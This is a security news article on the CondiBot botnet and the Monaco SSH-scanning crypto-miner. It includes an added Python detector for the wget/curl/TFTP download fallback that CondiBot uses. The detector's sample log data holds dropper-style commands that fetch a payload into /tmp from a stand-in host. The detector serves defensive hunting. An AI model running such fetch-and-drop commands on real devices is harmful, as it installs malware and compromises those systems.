As hackers focus more on network infrastructure instead of traditional endpoints, the attack surface of businesses is changing quickly. Researchers in the field of security have noticed a sharp rise in attacks on routers, firewalls, and IoT devices. This shows a growing trend in which these systems are used for both large-scale DDoS attacks and cryptocurrency mining.
Eclypsium's most recent research shows that this kind of activity is no longer limited to advanced nation-state groups. Financially motivated attackers are now using the same methods to make money from hacked devices. These attacks take advantage of weak settings, unpatched security holes, and a lack of visibility into network hardware.

New Types of Malware Targeting Network Devices

On March 6, 2026, researchers found two new types of malware that were actively targeting Linux-based systems and network devices.
The first one, CondiBot, is a new botnet variant derived from Mirai. It is meant to turn infected devices into remotely controlled nodes that can be used to launch distributed denial-of-service (DDoS) attacks. This version differs from earlier ones because it works with more than one system architecture, such as ARM, MIPS, and x86, which means it can infect a wide range of devices.

[Figure: How the Attack Works (Source: Eclypsium)]

CondiBot uses several download methods, such as wget, curl, and TFTP, to make sure the infection succeeds. Once installed, it connects to a command-and-control (C2) server, disables reboot functions, and gets rid of other malware. After that, it waits for orders to start network attacks.
Researchers also found that this version has more ways to attack and new identifiers, which means that work is still going on.
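As an added example (not from Eclypsium's research or the original article), the Python below shows one way to hunt for the multi-tool download fallback described above: it scans process-execution records for a host that invokes two or more of wget, curl, and TFTP within a short window. The record format, the 60-second window, the threshold of two tools, and the sample events are assumptions constructed for illustration.

```python
import re
import shlex
from collections import defaultdict

TRANSFER_TOOLS = {"wget", "curl", "tftp"}   # the three tools the article names
WINDOW_SECONDS = 60                          # assumed correlation window
MIN_DISTINCT_TOOLS = 2                       # assumed alert threshold

def tools_in_cmdline(cmdline):
    """Return the transfer tools invoked anywhere in one shell command line."""
    found = set()
    # Split on shell operators so each fallback stage is examined on its own.
    for stage in re.split(r"\|\||&&|[;|&\n]", cmdline):
        try:
            argv = shlex.split(stage)
        except ValueError:            # unbalanced quotes: fall back to whitespace
            argv = stage.split()
        if not argv:
            continue
        name = argv[0].rsplit("/", 1)[-1]
        if name == "busybox" and len(argv) > 1:   # applet form: "busybox wget ..."
            name = argv[1]
        if name in TRANSFER_TOOLS:
            found.add(name)
    return found

def find_fallback_chains(events):
    """events: iterable of (epoch_seconds, host, cmdline). Returns one alert
    (host, first_ts, sorted tools) per host that mixes tools inside the window."""
    recent = defaultdict(list)        # host -> [(ts, tool), ...] inside window
    alerted, alerts = set(), []
    for ts, host, cmdline in sorted(events):
        window = [(t, x) for t, x in recent[host] if ts - t <= WINDOW_SECONDS]
        window += [(ts, x) for x in tools_in_cmdline(cmdline)]
        recent[host] = window
        distinct = {tool for _, tool in window}
        if len(distinct) >= MIN_DISTINCT_TOOLS and host not in alerted:
            alerted.add(host)
            alerts.append((host, window[0][0], sorted(distinct)))
    return alerts

# Constructed sample exec-log records (documentation addresses, no real IoCs).
SAMPLE_EVENTS = [
    (1000, "edge-rtr-1", "cd /tmp; wget http://192.0.2.10/x || curl -O http://192.0.2.10/x || tftp -g -r x 192.0.2.10"),
    (1005, "web-01", "curl -fsS https://example.com/health"),
    (1010, "cam-7", "/bin/busybox wget http://192.0.2.10/y"),
    (1040, "cam-7", "busybox tftp -g -r y 192.0.2.10"),
    (5000, "web-01", "wget https://example.com/pkg.tar.gz"),
]
```

On the constructed sample, `find_fallback_chains(SAMPLE_EVENTS)` flags `edge-rtr-1` (all three tools in one command line) and `cam-7` (two BusyBox applets 30 seconds apart), while `web-01`'s isolated downloads stay below the threshold.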
The second strain, "Monaco," is a mix of an SSH scanner and a crypto-miner. Written in Go, it looks for open SSH services on the internet and uses brute-force methods with common passwords to get in. Once inside, it installs Monero mining software and sends stolen login information back to its C2 infrastructure.
Monaco is meant to work on a lot of different devices, like servers, routers, and IoT devices. It also kills other miners and speeds up the system to get the most cryptocurrency possible.

[Figure: Devices on the Network Globally Hijacked (Source: Eclypsium)]

Increasing Trend and Business Risk

Eclypsium research shows that these campaigns are part of a bigger trend that has been noted in industry reports. There has been a big rise in the number of attacks on network devices, and many of them happen before patches are applied.
Attackers often get in without any user interaction by going after systems that are connected to the internet, like VPNs and gateways.

| Feature | CondiBot Variant | Monaco Miner |
|---|---|---|
| Main goal | Carrying out DDoS botnet attacks | Scanning SSH and mining Monero |
| Target systems | Linux devices that use ARM, MIPS, or x86 | Juniper networks, servers, and routers |
| First access | Payload drops with transfer tools | Guessing passwords over SSH connections |
| Specific information | Internal label "QTXBOT" that is hidden | Made with Go and hosted on Alibaba Cloud |
| Staying hidden | Manipulating hardware to stay active | Making backup plans |

Network devices don't always have the same security monitoring tools as other devices. This makes it hard to see what's going on, which lets attackers stay hidden for a long time.
Once hacked, these devices give attackers strategic access for lateral movement, traffic interception, and maintaining control. The rise of malware like CondiBot and Monaco shows how hackers are combining disruption with profit-seeking. As network infrastructure becomes a major target, businesses must make patching, strong credentials, and better monitoring of these important systems their top priorities.












